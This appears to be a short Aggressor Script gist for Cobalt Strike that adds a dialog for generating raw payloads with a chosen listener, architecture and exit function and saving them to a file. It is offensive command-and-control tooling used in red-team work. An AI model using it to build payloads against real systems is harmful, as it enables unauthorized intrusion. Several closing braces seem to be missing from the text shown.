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Created October 4, 2020 18:04
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Cobalt Strike raw payload generation dialog that allows the exit function to be specified
popup attacks_other {
item("Payload (Choose Exit Function)", { GenPayloadDialog(); });
sub GenPayloadDialog {
$dialog = dialog("Payload", %(listener => "", arch => "", exitfunc => ""), &GenPayload);
drow_listener_stage($dialog, "listener", "Listener: ");
drow_combobox($dialog, "exitfunc", "Exit Function: ", @("thread", "process"));
drow_combobox($dialog, "arch", "Arch: ", @("x64", "x86"));
dbutton_action($dialog, "Generate");
sub GenPayload {
$data = payload($3['listener'], $3['arch'], $3['exitfunc']);
prompt_file_save($null, {
$handle = openf("> $+ $1");
writeb($handle, $data);
show_message("Saved payload to\n$1");
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